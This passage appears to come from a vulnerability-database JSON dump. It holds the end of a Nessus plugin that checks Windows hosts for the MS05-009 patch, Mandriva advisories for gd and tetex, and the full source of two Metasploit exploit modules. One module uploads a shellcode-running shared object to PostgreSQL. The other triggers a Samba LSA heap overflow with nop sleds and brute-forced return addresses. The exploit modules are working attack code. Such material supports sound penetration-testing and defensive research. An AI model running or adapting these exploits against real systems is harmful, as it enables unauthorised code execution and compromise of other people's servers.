script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:msn_messenger\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:windows_media_player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:windows_messenger\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS05-009';\n\nkbs = make_list(\"885492\", \"887472\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'4,5', xp:'1,2', win2003:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nprogfile = hotfix_get_programfilesdir();\nif (!progfile) exit(1, \"Failed to get the Program Files directory.\");\n\nshare = hotfix_path2share(path:progfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n hotfix_is_vulnerable(os:\"5.2\", sp:0, file:\"Wmp.dll\", version:\"9.0.0.3250\", min_version:\"9.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:'885492') ||\n hotfix_is_vulnerable(os:\"5.2\", file:\"Msmsgs.exe\", version:\"5.1.0.639\", min_version:\"5.1.0.0\", path:progfile, dir:\"\\Messenger\") ||\n hotfix_is_vulnerable(os:\"5.1\", sp:1, file:\"Wmp.dll\", version:\"9.0.0.3250\", min_version:\"9.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:'885492') ||\n hotfix_is_vulnerable(os:\"5.1\", sp:1, file:\"Msmsgs.exe\", version:\"4.7.0.2010\", min_version:\"4.7.0.0\", path:progfile, dir:\"\\Messenger\", bulletin:bulletin, kb:'887472') ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"Msmsgs.exe\", version:\"4.7.0.3001\", min_version:\"4.7.0.3000\", path:progfile, dir:\"\\Messenger\", bulletin:bulletin, kb:'887472') ||\n hotfix_is_vulnerable(os:\"5.1\", file:\"Msmsgs.exe\", version:\"5.1.0.639\", min_version:\"5.1.0.0\", path:progfile, dir:\"\\Messenger\") ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Msmsgs.exe\", version:\"5.1.0.639\", min_version:\"5.1.0.0\", path:progfile, dir:\"\\Messenger\") ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Wmp.dll\", version:\"9.0.0.3250\", min_version:\"9.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:'885492')\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-07-14T06:28:14", "bulletinFamily": "exploit", "description": "On some default Linux installations of PostgreSQL, the postgres service account may write to the /tmp directory, and may source UDF Shared Libraries from there as well, allowing execution of arbitrary code. This module compiles a Linux shared object file, uploads it to the target host via the UPDATE pg_largeobject method of binary injection, and creates a UDF (user defined function) from that shared object. Because the payload is run as the shared object's constructor, it does not need to conform to specific Postgres API versions.\n", "modified": "2019-04-29T19:28:11", "published": "2012-08-14T16:46:35", "id": "MSF:EXPLOIT/LINUX/POSTGRES/POSTGRES_PAYLOAD", "href": "", "type": "metasploit", "title": "PostgreSQL for Linux Payload Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/postgres'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Postgres\n include Msf::Auxiliary::Report\n\n # Creates an instance of this module.\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PostgreSQL for Linux Payload Execution',\n 'Description' => %q{\n On some default Linux installations of PostgreSQL, the\n postgres service account may write to the /tmp directory, and\n may source UDF Shared Libraries from there as well, allowing\n execution of arbitrary code.\n\n This module compiles a Linux shared object file, uploads it to\n the target host via the UPDATE pg_largeobject method of binary\n injection, and creates a UDF (user defined function) from that\n shared object. Because the payload is run as the shared object's\n constructor, it does not need to conform to specific Postgres\n API versions.\n },\n 'Author' =>\n [\n 'midnitesnake', # this Metasploit module\n 'egypt', # on-the-fly compiled .so technique\n 'todb', # original windows module this is based on\n 'lucipher' # updated module to work on Postgres 8.2+\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2007-3280' ],\n [ 'URL', 'http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt' ]\n ],\n 'Platform' => 'linux',\n 'Payload' =>\n {\n 'Space' => 65535,\n 'DisableNops' => true,\n },\n 'Targets' =>\n [\n [ 'Linux x86', { 'Arch' => ARCH_X86 } ],\n [ 'Linux x86_64', { 'Arch' => ARCH_X64 } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jun 05 2007'\n\n ))\n\n deregister_options('SQL', 'RETURN_ROWSET')\n end\n\n def check\n version = postgres_fingerprint\n\n if version[:auth]\n return CheckCode::Appears\n else\n print_error \"Authentication failed. #{version[:preauth] || version[:unknown]}\"\n return CheckCode::Safe\n end\n end\n\n def exploit\n version = do_login(username,password,database)\n case version\n when :noauth; print_error \"Authentication failed\"; return\n when :noconn; print_error \"Connection failed\"; return\n else\n print_status(\"#{rhost}:#{rport} - #{version}\")\n end\n\n fname = \"/tmp/#{Rex::Text.rand_text_alpha(8)}.so\"\n\n unless postgres_upload_binary_data(payload_so(fname), fname)\n print_error \"Could not upload the UDF SO\"\n return\n end\n\n print_status \"Uploaded as #{fname}, should be cleaned up automatically\"\n begin\n func_name = Rex::Text.rand_text_alpha(10)\n postgres_query(\n \"create or replace function pg_temp.#{func_name}()\"+\n \" returns void as '#{fname}','#{func_name}'\"+\n \" language c strict immutable\"\n )\n rescue RuntimeError => e\n print_error \"Failed to create UDF function: #{e.class}: #{e}\"\n end\n postgres_logout if @postgres_conn\n\n end\n\n # Authenticate to the postgres server.\n #\n # Returns the version from #postgres_fingerprint\n def do_login(user=nil,pass=nil,database=nil)\n begin\n password = pass || postgres_password\n vprint_status(\"Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}\")\n result = postgres_fingerprint(\n :db => database,\n :username => user,\n :password => password\n )\n if result[:auth]\n report_service(\n :host => rhost,\n :port => rport,\n :name => \"postgres\",\n :info => result.values.first\n )\n return result[:auth]\n else\n print_error(\"Login failed, fingerprint is #{result[:preauth] || result[:unknown]}\")\n return :noauth\n end\n rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError\n return :noconn\n end\n end\n\n\n def payload_so(filename)\n shellcode = Rex::Text.to_hex(payload.encoded, \"\\\\x\")\n #shellcode = \"\\\\xcc\"\n\n c = %Q^\n int _exit(int);\n int printf(const char*, ...);\n int perror(const char*);\n void *mmap(int, int, int, int, int, int);\n void *memcpy(void *, const void *, int);\n int mprotect(void *, int, int);\n int fork();\n int unlink(const char *pathname);\n\n #define MAP_PRIVATE 2\n #define MAP_ANONYMOUS 32\n #define PROT_READ 1\n #define PROT_WRITE 2\n #define PROT_EXEC 4\n\n #define PAGESIZE 0x1000\n\n typedef struct _Pg_magic_struct {\n int len;\n int version;\n int funcmaxargs;\n int indexmaxkeys;\n int namedatalen;\n int float4byval;\n int float8byval;\n } Pg_magic_struct;\n\n extern const Pg_magic_struct *PG_MAGIC_FUNCTION_NAME(void);\n\n const Pg_magic_struct * PG_MAGIC_FUNCTION_NAME(void)\n {\n static const Pg_magic_struct Pg_magic_data = {sizeof(Pg_magic_struct), 804, 100, 32, 64, 1, 1};\n return &Pg_magic_data;\n }\n\n char shellcode[] = \"#{shellcode}\";\n\n void run_payload(void) __attribute__((constructor));\n\n void run_payload(void)\n {\n int (*fp)();\n fp = mmap(0, PAGESIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);\n\n memcpy(fp, shellcode, sizeof(shellcode));\n if (mprotect(fp, PAGESIZE, PROT_READ|PROT_WRITE|PROT_EXEC)) {\n _exit(1);\n }\n if (!fork()) {\n fp();\n }\n\n unlink(\"#{filename}\");\n return;\n }\n\n ^\n\n cpu = case target_arch.first\n when ARCH_X86; Metasm::Ia32.new\n when ARCH_X64; Metasm::X86_64.new\n end\n payload_so = Metasm::ELF.compile_c(cpu, c, \"payload.c\")\n\n so_file = payload_so.encode_string(:lib)\n\n so_file\n end\nend\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/postgres/postgres_payload.rb"}, {"lastseen": "2019-07-11T08:25:26", "bulletinFamily": "exploit", "description": "This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the szone_free() to overwrite the size() or free() pointer in initial_malloc_zones structure.\n", "modified": "2017-07-24T13:26:21", "published": "2007-07-05T15:12:02", "id": "MSF:EXPLOIT/OSX/SAMBA/LSA_TRANSNAMES_HEAP", "href": "", "type": "metasploit", "title": "Samba lsa_io_trans_names Heap Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Exploit::Brute\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Samba lsa_io_trans_names Heap Overflow',\n 'Description' => %q{\n This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon. This module uses the szone_free() to overwrite\n the size() or free() pointer in initial_malloc_zones structure.\n },\n 'Author' =>\n [\n 'Ramon de C Valle',\n 'Adriano Lima <adriano[at]risesecurity.org>',\n 'hdm'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2007-2446'],\n ['OSVDB', '34699'],\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 1024,\n },\n 'Platform' => 'osx',\n 'DefaultOptions' =>\n {\n 'PrependSetresuid' => true,\n },\n 'Targets' =>\n [\n ['Mac OS X 10.4.x x86 Samba 3.0.10',\n {\n 'Platform' => 'osx',\n 'Arch' => [ ARCH_X86 ],\n 'Nops' => 4 * 1024,\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0x01818000 },\n 'Stop' => { 'Ret' => 0x01830000 },\n 'Step' => 3351,\n },\n }\n ],\n ['Mac OS X 10.4.x PPC Samba 3.0.10',\n {\n 'Platform' => 'osx',\n 'Arch' => [ ARCH_PPC ],\n 'Nops' => 1600,\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0x01813000 },\n 'Stop' => { 'Ret' => 0x01830000 },\n 'Step' => 796,\n }\n }\n ],\n ['DEBUG',\n {\n 'Platform' => 'osx',\n 'Arch' => [ ARCH_X86 ],\n 'Nops' => 4 * 1024,\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xaabbccdd },\n 'Stop' => { 'Ret' => 0xaabbccdd },\n 'Step' => 0,\n }\n }\n ],\n ],\n 'DisclosureDate' => 'May 14 2007'\n ))\n\n register_options(\n [\n OptString.new('SMBPIPE', [ true, \"The pipe name to use\", 'LSARPC']),\n ])\n\n end\n\n # Handle a strange byteswapping issue on PPC\n def ppc_byteswap(addr)\n data = [addr].pack('N')\n (data[1,1] + data[0,1] + data[3,1] + data[2,1]).unpack('N')[0]\n end\n\n def brute_exploit(target_addrs)\n\n if(not @nops)\n if (target['Nops'] > 0)\n print_status(\"Creating nop sled....\")\n @nops = make_nops(target['Nops'])\n else\n @nops = ''\n end\n end\n\n print_status(\"Trying to exploit Samba with address 0x%.8x...\" % target_addrs['Ret'])\n\n pipe = datastore['SMBPIPE'].downcase\n\n print_status(\"Connecting to the SMB service...\")\n connect()\n smb_login()\n\n datastore['DCERPC::fake_bind_multi'] = false\n\n handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', [\"\\\\#{pipe}\"])\n print_status(\"Binding to #{handle} ...\")\n dcerpc_bind(handle)\n print_status(\"Bound to #{handle} ...\")\n\n num_entries = 256\n num_entries2 = 257\n\n #\n # First talloc_chunk\n # 16 bits align\n # 16 bits sid_name_use\n # 16 bits uni_str_len\n # 16 bits uni_max_len\n # 32 bits buffer\n # 32 bits domain_idx\n #\n buf = (('A' * 16) * num_entries)\n\n # Padding\n buf << 'A' * 4\n\n #\n # Use the szone_free() to overwrite the size() pointer in\n # initial_malloc_zones structure.\n #\n size_pointer = 0x1800008\n\n # Initial nops array\n nops = ''\n\n # x86\n if (target.arch.include?(ARCH_X86))\n\n #\n # We don't use the size() pointer anymore because it\n # results in a unexpected behavior when smbd process\n # is started by launchd.\n #\n free_pointer = 0x1800018\n nop = \"\\x16\"\n\n #\n # First talloc_chunk\n # 16 bits align\n # 16 bits sid_name_use\n # 16 bits uni_str_len\n # 16 bits uni_max_len\n # 32 bits buffer\n # 32 bits domain_idx\n #\n\n # First nop block\n buf = ((nop * 16) * num_entries)\n\n #\n # A nop block of 0x16 (pushl %ss) and the address of\n # 0x1800014 results in a jns instruction which when\n # executed will jump over the address written eight\n # bytes past our target address by szone_free() (the\n # sign flag is zero at the moment our target address is\n # executed).\n #\n # 0x357b ^ ( 0x1800014 ^ 0x16161616 ) = 0x17962379\n #\n # This is the output of the sequence of xor operations\n # 0: 79 23 jns 0x25\n # 2: 96 xchgl %eax,%esi\n # 3: 17 popl %ss\n # 4: 16 pushl %ss\n # 5: 16 pushl %ss\n # 6: 16 pushl %ss\n # 7: 16 pushl %ss\n # 8: 14 00 adcb $0x0,%al\n # a: 80 01 16 addb $0x16,(%ecx)\n #\n # This jump is needed because the ecx register does not\n # point to a valid memory location in free() context\n # (it is zero).\n #\n # The jump will hit our nop block which will be executed\n # until it reaches the payload.\n #\n\n # Padding nops\n buf << nop * 2\n\n # Jump over the pointers\n buf << \"\\xeb\\x08\"\n\n # Pointers\n buf << [target_addrs['Ret']].pack('V')\n buf << [free_pointer - 4].pack('V')\n\n #\n # We expect to hit this nop block or the one before\n # the pointers.\n #\n buf << nop * (3852 - 8 - payload.encoded.length)\n\n # Payload\n buf << payload.encoded\n\n # Padding nops\n buf << nop * 1024\n\n stub = lsa_open_policy(dcerpc)\n\n stub << NDR.long(0) # num_entries\n stub << NDR.long(0) # ptr_sid_enum\n stub << NDR.long(num_entries) # num_entries\n stub << NDR.long(0x20004) # ptr_trans_names\n stub << NDR.long(num_entries2) # num_entries2\n stub << buf\n\n # PPC\n else\n\n #\n # The first half of the nop sled is an XOR encoded branch\n # instruction. The second half is a series of unencoded nop\n # instructions. The result is:\n #\n # > This is the decoded branch instruction\n # 0x181c380: bl 0x181c6a0\n #\n # > The size pointer is written below this\n # 0x181c384: .long 0x1800004\n #\n # > Followed by the encoded branch sled\n # 0x181c388: ba 0x180365c\n # [ ... ]\n #\n # > The branch lands in the normal nop sled\n # 0x181c6a0: andi. r17,r16,58162\n # [ ... ]\n #\n # > Finally we reach our payload :-)\n #\n\n size_pointer = size_pointer - 4\n\n sled = target['Nops']\n jump = [ 0x357b ^ ( size_pointer ^ (0x48000001 + sled / 2 )) ].pack('N')\n nops = (jump * (sled / 8)) + @nops[0, sled / 8]\n\n addr_size = ppc_byteswap(size_pointer)\n addr_ret = ppc_byteswap(target_addrs['Ret'])\n\n # This oddness is required for PPC\n buf << [addr_size].pack('N')\n buf << [addr_ret ].pack('N')[2,2]\n buf << [addr_ret ].pack('N')\n\n # Padding\n buf << \"A\" * (256 - 10)\n\n stub = lsa_open_policy(dcerpc)\n\n stub << NDR.long(0) # num_entries\n stub << NDR.long(0) # ptr_sid_enum\n stub << NDR.long(num_entries) # num_entries\n stub << NDR.long(0x20004) # ptr_trans_names\n stub << NDR.long(num_entries2) # num_entries2\n stub << buf\n stub << nops\n stub << payload.encoded\n end\n\n print_status(\"Calling the vulnerable function...\")\n\n begin\n # LsarLookupSids\n dcerpc.call(0x0f, stub)\n rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError\n print_status('Server did not respond, this is expected')\n rescue Rex::Proto::DCERPC::Exceptions::Fault\n print_error('Server is most likely patched...')\n rescue => e\n if e.to_s =~ /STATUS_PIPE_DISCONNECTED/\n print_status('Server disconnected, this is expected')\n else\n print_error(\"Error: #{e.class}: #{e}\")\n end\n end\n\n handler\n disconnect\n end\n\n def lsa_open_policy(dcerpc, server=\"\\\\\")\n\n stubdata =\n # Server\n NDR.uwstring(server) +\n # Object Attributes\n NDR.long(24) + # SIZE\n NDR.long(0) + # LSPTR\n NDR.long(0) + # NAME\n NDR.long(0) + # ATTRS\n NDR.long(0) + # SEC DES\n # LSA QOS PTR\n NDR.long(1) + # Referent\n NDR.long(12) + # Length\n NDR.long(2) + # Impersonation\n NDR.long(1) + # Context Tracking\n NDR.long(0) + # Effective Only\n # Access Mask\n NDR.long(0x02000000)\n\n res = dcerpc.call(6, stubdata)\n\n dcerpc.last_response.stub_data[0,20]\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/samba/lsa_transnames_heap.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n \r\n Mandriva Linux Security Advisory MDKSA-2006:112\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n \r\n Package : gd\r\n Date : June 27, 2006\r\n Affected: 10.2, 2006.0\r\n _______________________________________________________________________\r\n \r\n Problem Description:\r\n \r\n The LZW decoding in the gdImageCreateFromGifPtr function in the Thomas \r\n Boutell graphics draw &#40;GD&#41; library &#40;aka libgd&#41; 2.0.33 allows remote \r\n attackers to cause a denial of service &#40;CPU consumption&#41; via malformed \r\n GIF data that causes an infinite loop.\r\n \r\n gd-2.0.15 in Corporate 3.0 is not affected by this issue.\r\n \r\n Packages have been patched to correct this issue.\r\n _______________________________________________________________________\r\n\r\n References:\r\n \r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2906\r\n _______________________________________________________________________\r\n \r\n Updated Packages:\r\n \r\n Mandriva Linux 10.2:\r\n a8b7178a2e3aabd8f26f0575cc8775ae 10.2/RPMS/gd-utils-2.0.33-3.1.102mdk.i586.rpm\r\n e3ef1e900f6de8cdaea4d6fd5a516476 10.2/RPMS/libgd2-2.0.33-3.1.102mdk.i586.rpm\r\n cfe793a05357a871c3bce58ac19431a3 10.2/RPMS/libgd2-devel-2.0.33-3.1.102mdk.i586.rpm\r\n 21e65240b1c3afc878861e86e993df88 10.2/RPMS/libgd2-static-devel-2.0.33-3.1.102mdk.i586.rpm\r\n ad156d018149831cf4c0fec70bb9ba67 10.2/SRPMS/gd-2.0.33-3.1.102mdk.src.rpm\r\n\r\n Mandriva Linux 10.2/X86_64:\r\n 37d535359d49339434c107a48b11a8ea x86_64/10.2/RPMS/gd-utils-2.0.33-3.1.102mdk.x86_64.rpm\r\n ff1287dd3c92ba8933162e5caf54d123 x86_64/10.2/RPMS/lib64gd2-2.0.33-3.1.102mdk.x86_64.rpm\r\n 4f8eaad304f1ed2e0be07f969d8cae72 x86_64/10.2/RPMS/lib64gd2-devel-2.0.33-3.1.102mdk.x86_64.rpm\r\n df8f7bc54de7ab615128871448c8fcd4 x86_64/10.2/RPMS/lib64gd2-static-devel-2.0.33-3.1.102mdk.x86_64.rpm\r\n ad156d018149831cf4c0fec70bb9ba67 x86_64/10.2/SRPMS/gd-2.0.33-3.1.102mdk.src.rpm\r\n\r\n Mandriva Linux 2006.0:\r\n 464c206bd702817804b25b0602c9682d 2006.0/RPMS/gd-utils-2.0.33-3.1.20060mdk.i586.rpm\r\n a1f0caedbb819ae5aaf0259d657ab137 2006.0/RPMS/libgd2-2.0.33-3.1.20060mdk.i586.rpm\r\n 2157623bebe2e780d519ab33f6846b4a 2006.0/RPMS/libgd2-devel-2.0.33-3.1.20060mdk.i586.rpm\r\n 38190793bfa2aec8feaaeec235c83020 2006.0/RPMS/libgd2-static-devel-2.0.33-3.1.20060mdk.i586.rpm\r\n b95de17443646c61d83adba4378a5d71 2006.0/SRPMS/gd-2.0.33-3.1.20060mdk.src.rpm\r\n\r\n Mandriva Linux 2006.0/X86_64:\r\n 4036c957b65111965a17c0e792b53739 x86_64/2006.0/RPMS/gd-utils-2.0.33-3.1.20060mdk.x86_64.rpm\r\n 30b39956ee262b92a88e6148d8691735 x86_64/2006.0/RPMS/lib64gd2-2.0.33-3.1.20060mdk.x86_64.rpm\r\n 1d28e426cecac98c3248d3c61727e842 x86_64/2006.0/RPMS/lib64gd2-devel-2.0.33-3.1.20060mdk.x86_64.rpm\r\n 9ef94ef9bb6b02afb3b67617eb3e36c9 \r\nx86_64/2006.0/RPMS/lib64gd2-static-devel-2.0.33-3.1.20060mdk.x86_64.rpm\r\n b95de17443646c61d83adba4378a5d71 x86_64/2006.0/SRPMS/gd-2.0.33-3.1.20060mdk.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.2.2 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFEoaz2mqjQ0CJFipgRAqjAAJoCtlhpb95ZmP0unk5MP92uOEekhQCdHlGH\r\nkZbOHCAUixee4sfAOoBU7M8=\r\n=hfg5\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "modified": "2006-06-28T00:00:00", "published": "2006-06-28T00:00:00", "id": "SECURITYVULNS:DOC:13352", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13352", "title": "[Full-disclosure] [ MDKSA-2006:112 ] - Updated gd packages fix DoS vulnerability.", "type": "securityvulns", "cvss": {"score": 5.4, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n \r\n Mandriva Linux Security Advisory MDKSA-2006:113\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n \r\n Package : tetex\r\n Date : June 27, 2006\r\n Affected: 10.2, 2006.0\r\n _______________________________________________________________________\r\n \r\n Problem Description:\r\n \r\n Integer overflows were reported in the GD Graphics Library &#40;libgd&#41;\r\n 2.0.28, and possibly other versions. These overflows allow remote\r\n attackers to cause a denial of service and possibly execute arbitrary\r\n code via PNG image files with large image rows values that lead to a\r\n heap-based buffer overflow in the gdImageCreateFromPngCtx&#40;&#41; function. \r\n Tetex contains an embedded copy of the GD library code. &#40;CAN-2004-0941&#41;\r\n \r\n The LZW decoding in the gdImageCreateFromGifPtr function in the Thomas \r\n Boutell graphics draw &#40;GD&#41; library &#40;aka libgd&#41; 2.0.33 allows remote attackers \r\n to cause a denial of service &#40;CPU consumption&#41; via malformed GIF data that \r\n causes an infinite loop. Tetex contains an embedded copy of the GD library\r\n code. &#40;CVE-2006-2906&#41;\r\n \r\n Updated packages have been patched to address both issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n \r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0941\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2906\r\n _______________________________________________________________________\r\n \r\n Updated Packages:\r\n \r\n Mandriva Linux 10.2:\r\n 5bcf729ccb4caca85d8d2142293b2d77 10.2/RPMS/jadetex-3.12-106.2.102mdk.i586.rpm\r\n bc31e31b117e2a751da7849907df917c 10.2/RPMS/tetex-3.0-8.2.102mdk.i586.rpm\r\n 0910bcc1bce95b11963262c3b722fc47 10.2/RPMS/tetex-afm-3.0-8.2.102mdk.i586.rpm\r\n a3eac32b19e1c212c6ec8bf5ba6ca34a 10.2/RPMS/tetex-context-3.0-8.2.102mdk.i586.rpm\r\n b4a7db5b9c127e2399afdaf478f1141f 10.2/RPMS/tetex-devel-3.0-8.2.102mdk.i586.rpm\r\n 9679b875893e7a5d283802472cf784eb 10.2/RPMS/tetex-doc-3.0-8.2.102mdk.i586.rpm\r\n 3b250dbb1aa85b427f149eeb7b93bee5 10.2/RPMS/tetex-dvilj-3.0-8.2.102mdk.i586.rpm\r\n 2af97694741d1589b9d4f4e9e2fff794 10.2/RPMS/tetex-dvipdfm-3.0-8.2.102mdk.i586.rpm\r\n 713efa8fa744a3cb344ec016c7892be3 10.2/RPMS/tetex-dvips-3.0-8.2.102mdk.i586.rpm\r\n 8646db9366788d889c03333975a58fb3 10.2/RPMS/tetex-latex-3.0-8.2.102mdk.i586.rpm\r\n 4b2bb6743bdda9afc4acaa5e9886eaf5 10.2/RPMS/tetex-mfwin-3.0-8.2.102mdk.i586.rpm\r\n b2f6632e88505d5449369f352bd3defe 10.2/RPMS/tetex-texi2html-3.0-8.2.102mdk.i586.rpm\r\n 4c6665db413bc2763e671368c594b96d 10.2/RPMS/tetex-xdvi-3.0-8.2.102mdk.i586.rpm\r\n 95689eb1cd6a82f24063af60dd6f6427 10.2/RPMS/xmltex-1.9-54.2.102mdk.i586.rpm\r\n 73dffa296703ab7de146d3fbe811ab10 10.2/SRPMS/tetex-3.0-8.2.102mdk.src.rpm\r\n\r\n Mandriva Linux 10.2/X86_64:\r\n e67d983720943369fde6b38fadae015a x86_64/10.2/RPMS/jadetex-3.12-106.2.102mdk.x86_64.rpm\r\n 75416081cfc3cdf6a8ccfe689618cae8 x86_64/10.2/RPMS/tetex-3.0-8.2.102mdk.x86_64.rpm\r\n 81ad797551550873a29f408bd0740ac7 x86_64/10.2/RPMS/tetex-afm-3.0-8.2.102mdk.x86_64.rpm\r\n 37f969186982784662e8ea84acd93713 x86_64/10.2/RPMS/tetex-context-3.0-8.2.102mdk.x86_64.rpm\r\n d20f39d3ef368502677cb5e137c41831 x86_64/10.2/RPMS/tetex-devel-3.0-8.2.102mdk.x86_64.rpm\r\n 29717e89753a6566846d77c38d0ea661 x86_64/10.2/RPMS/tetex-doc-3.0-8.2.102mdk.x86_64.rpm\r\n ed84f2352218a281b3e926a00be8503c x86_64/10.2/RPMS/tetex-dvilj-3.0-8.2.102mdk.x86_64.rpm\r\n 09c946780c1bee9c2c66fbc0456d3225 x86_64/10.2/RPMS/tetex-dvipdfm-3.0-8.2.102mdk.x86_64.rpm\r\n dbd732fc3fbd6b95d4cdf819ce5229a2 x86_64/10.2/RPMS/tetex-dvips-3.0-8.2.102mdk.x86_64.rpm\r\n b0c55dba84cf1c9be4f3e04d2ce53e41 x86_64/10.2/RPMS/tetex-latex-3.0-8.2.102mdk.x86_64.rpm\r\n 73dcdebb1514d70b2bba997ce3562453 x86_64/10.2/RPMS/tetex-mfwin-3.0-8.2.102mdk.x86_64.rpm\r\n 95f4fa468924bd6be520da4dde69d379 